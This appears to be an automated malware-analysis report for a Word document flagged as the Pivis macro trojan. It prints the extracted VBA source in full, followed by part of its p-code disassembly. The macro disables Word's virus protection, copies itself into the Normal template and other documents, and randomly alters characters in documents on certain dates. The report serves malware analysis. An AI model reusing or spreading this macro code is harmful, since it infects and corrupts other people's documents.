Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 49a5b420151c3db4…

MALICIOUS

Office (OLE)

40.5 KB Created: 2001-09-24 12:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 9f708f81fd3cc6a086b67a70c6ff0125 SHA-1: 94b9316e91a6376cc8b1350bd1ef5250cf48b0f5 SHA-256: 49a5b420151c3db455fbd8327b9ff41eba5a44dc0b27de3be633092f81ced81b
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Microsoft Word document containing VBA macros, detected as malicious by ClamAV with multiple signatures. The VBA code attempts to save itself to 'c:\captainL.$$$' and potentially re-inject it into the Normal template or the active document. This behavior suggests an attempt to establish persistence or prepare for further malicious execution, though the exact payload is not discernible from the truncated script.

Heuristics 2

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9454 bytes
SHA-256: 06fc10bcab4c378902b2ece4e5230aae227da6e973fee2acb67edddaa4791459
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()

fName = "c:\captainL.$$$"
fAttr = 6

On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
Randomize
With Options
  .ConfirmConversions = False
  .VirusProtection = False
  .SaveNormalPrompt = False
End With
'saving to disk
If Dir(fName, fAttr) = "" Then
  Set t = ActiveDocument.VBProject.VBComponents.Item(1)
  Set t = MacroContainer.VBProject.VBComponents.Item(1)
  Open fName For Output As #1
    For i = 1 To t.CodeModule.CountOfLines
      Print #1, t.CodeModule.Lines(i, 1)
    Next
  Close #1
  SetAttr fName, fAttr
End If

Set t1 = NormalTemplate.VBProject.VBComponents.Item(1)
Set t2 = ActiveDocument.VBProject.VBComponents.Item(1)

If t1.CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
  Set t = t1
ElseIf t2.CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
  Set t = t2
Else
  t = ""
End If

'dup
If t <> "" Then
  Open fName For Input As #1
  If LOF(1) <> 0 Then
    i = 1
    Do While Not EOF(1)
      Line Input #1, txt
      t.CodeModule.InsertLines i, txt
      i = i + 1
    Loop
  End If
  Close #1
End If

'action
sav = ActiveDocument.Saved
today = Day(Date)
If (Month(Date) < 4) Or (Month(Date) > 5) Then
  If today = 17 Then
  End If
  Set t = ActiveDocument.Characters
  If (Rnd < 0.321) And (today > 21) Then
    For i = 1 To t.Count
      ch = t.Item(i)
      If ch = "è" Then
        t.Item(i) = "à"
      ElseIf ch = "é" Then t.Item(i) = "e"
      ElseIf ch = "à" Then t.Item(i) = "a"
      ElseIf ch = "ì" Then t.Item(i) = "ù"
      ElseIf ch = "ò" Then t.Item(i) = "o"
      ElseIf ch = "ù" Then t.Item(i) = "ì"
      End If
    Next
  End If
  If (Rnd > 0.777) And (today < 5) Then
    For i = 1 To t.Count
      ch = t.Item(i)
      If ch = ":" Then
        t.Item(i) = "."
      ElseIf ch = "," Then t.Item(i) = " "
      ElseIf (ch = ".") And (Rnd < 0.5) Then t.Item(i) = "!"
      ElseIf ch = "!" Then t.Item(i) = "?"
      ElseIf ch = "?" Then t.Item(i) = "!"
      End If
    Next
  End If
End If

'update doc
If Left(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ActiveDocument.Saved = sav

End Sub

Private Sub Document_New()

End Sub

' Processing file: /opt/analyzer/scan_staging/751aa463e00c47c795fb69dbca0c288b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 8899 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' Line #2:
' 	LitStr 0x000F "c:\captainL.$$$"
' 	St fName 
' Line #3:
' 	LitDI2 0x0006 
' 	St fAttr 
' Line #4:
' Line #5:
' 	OnError (Resume Next) 
' Line #6:
' 	Ld wdCancelDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #7:
' 	ArgsCall Read 0x0000 
' Line #8:
' 	StartWithExpr 
' 	Ld Options 
' 	With 
' Line #9:
' 	LitVarSpecial (False)
' 	MemStWith ConfirmConversions 
' Line #10:
' 	LitVarSpecial (False)
' 	MemStWith VirusProtection 
' Line #11:
' 	LitVarSpecial (False)
' 	MemStWith SaveNormalPrompt 
' Line #12:
' 	EndWith 
' Line #13:
' 	QuoteRem 0x0000 0x000E "saving to disk"
' Line #14:
' 	Ld fName 
' 	Ld fAttr 
' 	ArgsLd Dir 0x0002 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #15:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set t 
' Line #16:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set t 
' Line #17:
' 	Ld fName 
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #18:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld t 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	For 
' Line #19:
' 	LitDI2 0x0001 
' 	Sharp 
' 	PrintChan 
' 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.